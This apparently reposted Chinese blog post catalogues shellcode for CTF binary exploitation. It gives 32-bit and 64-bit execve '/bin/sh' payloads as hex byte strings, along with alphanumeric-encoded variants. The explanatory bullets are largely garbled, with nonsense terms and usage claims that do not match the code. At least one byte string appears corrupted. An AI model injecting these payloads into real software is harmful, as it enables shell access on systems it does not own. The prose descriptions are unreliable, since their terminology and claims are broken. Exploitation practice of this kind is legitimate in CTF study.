本文共 1466 字，大约阅读时间需要 4 分钟。

<pwning中的Shellcode汇总

在pwn中的Shellcode Techniques（SCTF或Others）的研究与分享中，Shellcode是最基础也是最重要的工具之一。设计高效、隐蔽且可靠的Shellcode不仅需要对操作系统的内存管理机制有深入理解，还需要对编码技巧有较高的技术层次。以下将对常见的Shellcode类型进行分类总结，供参考。

32位Shellcode

32位Shellcode在技术发展随着时间推移，经历了从简单到复杂、从稳定到隐蔽的演变。以下是一些经典的32位Shellcode样例：

1. 简短型（21字节）

\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\n\x89\xe3\x31\xc9\xcd\x80

• 特点：代码长度最短，运行速度极快。
• 适用场景：快速注入、横向移动、反病毒检测等场景。
• 硬性要求：通常需要满足ASCII兼容性。

2. 纯ASCII字符型

PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJISZTK1HMIQBSVCX6MU3K9M7CXVOSC3XS0BHVOBBE9RNLIJC62ZH5X5PS0C0FOE22I2NFOSCRHEP0WQCK9KQ8MK0AA

• 特点：100%由ASCII字符组成，免去了二进制piler的依赖。
• 优化技巧：合理分段、趋势得已知编码技巧。
• 潜在风险：容易被杀毒软件过滤。

3. scandiable的可读取型

\xeb\x1b\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x29\xc0\xaa\x89\xf9\x89\xf0\xab\x89\xfa\x29\xc0\xab\xb0\x08\x04\x03\xcd\x80\xe8\xe0\xff\xff\xff/bin/sh

• 特点：通过scandump等工具生成，完全可读。
• 适用场景：C2通信、反求余分析等。
• 优化建议：减少超链接增加多维度性。

64位Shellcode

随着64位系统的普及，Shellcode技术也在不断革新，以下是64位系统中常见的Shellcode形式：

1. scandiable的可读取型

\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05

• 特点：完全可读，可优化向量长度。
• 可读性分析：支持多种分析工具。
• 进阶优化：增加辅助向量、改善机制抗ake。

2. 纯ASCII字符型

Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t

• 优化方向：趋势分析、规则提取、结构优化。
• 抗逆向优化：加密理解、抄袭防御技术。

开发建议

希望以上总结能够为技术爱好者提供一些参考价值，同时也建议大家多关注最新技术动态，持续提升自己的技术实力！

转载地址：http://kcuxz.baihongyu.com/